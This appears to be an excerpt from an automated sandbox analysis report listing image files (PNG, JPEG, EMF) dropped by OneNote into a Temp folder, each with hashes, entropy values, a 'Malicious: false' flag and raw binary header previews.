Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Temp\{0BAABD55-294F-4178-83C7-06F275D90B53}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Temp\{0BDF512A-3852-4876-BE00-B15F9AB165CE}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
Category:	dropped
Size (bytes):	36740
Entropy (8bit):	7.48266872907324
Encrypted:	false
SSDEEP:	768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
MD5:	9C205C8D770516C5AA70D31B2CA00AF3
SHA1:	9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
SHA-256:	E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
SHA-512:	A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).

C:\Users\user\AppData\Local\Temp\{0C1A4FDE-7B30-4A03-A497-9062BAAD70D4}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	7.252780160030615
Encrypted:	false
SSDEEP:	48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
MD5:	F6C596F505504044DF1E36BA5DA3F09B
SHA1:	BCF17EC408899B822492B47E307DE638CC792447
SHA-256:	EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
SHA-512:	E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
Malicious:	false
Preview:	.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....

C:\Users\user\AppData\Local\Temp\{0D1E15F7-2E37-408D-8AA2-55984C76431A}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Temp\{0E04ED18-80CA-4117-B649-2DEA6C2FF554}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Temp\{0E57B19E-8A6E-48B9-A5B3-6B841D686CE2}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
Category:	dropped
Size (bytes):	140755
Entropy (8bit):	7.9013245181576695
Encrypted:	false
SSDEEP:	3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
MD5:	CC087700C07D674D69AFDFDA0FA9825C
SHA1:	F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
SHA-256:	A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
SHA-512:	843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.

C:\Users\user\AppData\Local\Temp\{0F239F01-7387-43B9-AC82-2ED376B81CFB}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Temp\{0F6F64AE-4EC3-480C-8105-1DC5E3761D39}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Temp\{0FF5AE1A-8CC6-4BC2-AC3A-E4E16FE58EE0}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Temp\{108F4470-4541-4AEB-A691-8F7C1CCCAAA6}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
Category:	dropped
Size (bytes):	784
Entropy (8bit):	6.962539208465222
Encrypted:	false
SSDEEP:	12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
MD5:	14105A831FE32590E52C2E2E41879624
SHA1:	078FA63FC7DB5830E9059DF02D56882240429D90
SHA-256:	D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
SHA-512:	8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`...C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%\|.f.~.......:y....S....UKovh...W'........lF... .................

C:\Users\user\AppData\Local\Temp\{120F8287-DAA6-4A38-8388-1DFB30108896}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Temp\{12C5352A-927F-4938-B487-34C5F06FEC4B}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	84941
Entropy (8bit):	7.966881945560921
Encrypted:	false
SSDEEP:	1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
MD5:	CB84C108A76C2AFFCAC2551A3C1EAD56
SHA1:	8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
SHA-256:	139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
SHA-512:	6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z\|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t

C:\Users\user\AppData\Local\Temp\{13713C0D-8DB8-43BC-A2DF-EBE5CB6E1865}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Temp\{13A8B4B7-2D8A-4CE6-A843-8F6BB17B2E54}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Temp\{14D6C864-A69F-4AA4-9F7E-162009B5803C}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
